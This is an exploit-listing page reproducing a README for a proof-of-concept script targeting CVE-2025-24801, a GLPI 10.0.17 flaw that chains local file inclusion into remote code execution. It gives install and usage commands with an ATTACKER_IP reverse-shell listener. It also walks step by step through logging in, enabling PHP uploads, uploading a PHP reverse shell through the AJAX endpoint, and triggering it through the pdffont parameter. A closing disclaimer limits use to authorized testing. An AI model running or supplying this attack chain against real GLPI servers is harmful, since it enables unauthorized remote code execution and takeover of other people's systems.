Exploit for CVE-2025-24801

Name: Exploit for CVE-2025-24801
Rating: 5 (109 reviews)
2025-05-05 | CVSS 8.5
## https://sploitus.com/exploit?id=D62715BF-1F90-5831-A32A-4BDA94983B7E
# CVE-2025-24801 PoC for GLPI RCE

This repository contains a proof-of-concept script (`poc.py`) that exploits CVE-2025-24801, an LFI-to-RCE vulnerability in GLPI 10.0.17. It automates:

* Logging into GLPI
* Enabling `.php` uploads by updating document type settings
* Uploading a PHP reverse shell via the AJAX file upload endpoint

## 🛠️ Installation

```bash
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
```

## 🚀 Usage

```bash
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
```

* `--url`: Base URL of the GLPI instance (e.g. `https://example.com/glpi`)
* `--user` / `--password`: Valid GLPI technician credentials
* `--lhost` / `--lport`: Attacker IP and port for the reverse shell listener

The script automatically uses `--doc-id 1` by default to update the first document type.

After execution, the script will:

1. Log in and establish a session
2. Enable `.php` uploads by updating document type ID 1
3. Upload `exploit.php` containing a PHP reverse shell payload

You will then need to manually trigger the LFI by specifying the uploaded filename in the PDF font include (e.g., via the report export feature) to achieve RCE.

## 📑 How It Works

1. **Login**: Extracts the CSRF token from `/front/login.php` and posts credentials to authenticate.
2. **Enable PHP Uploads**: Fetches `/front/documenttype.form.php?id=1`, parses the CSRF token, and adds `php` to the allowed extensions.
3. **Upload Shell**: Fetches `/front/ticket.form.php` for a CSRF token, then uses `/ajax/fileupload.php` (with `X-Requested-With: XMLHttpRequest`) to upload a PHP reverse shell.
4. **Trigger RCE**: Manually invoke the PDF font LFI by specifying the uploaded shell filename in the `pdffont` parameter during report export.

## ⚠️ Disclaimer

This tool is intended for authorized security testing and educational purposes only. Do not use it against systems without explicit permission.

---

*Created for educational and authorized pentesting purposes.*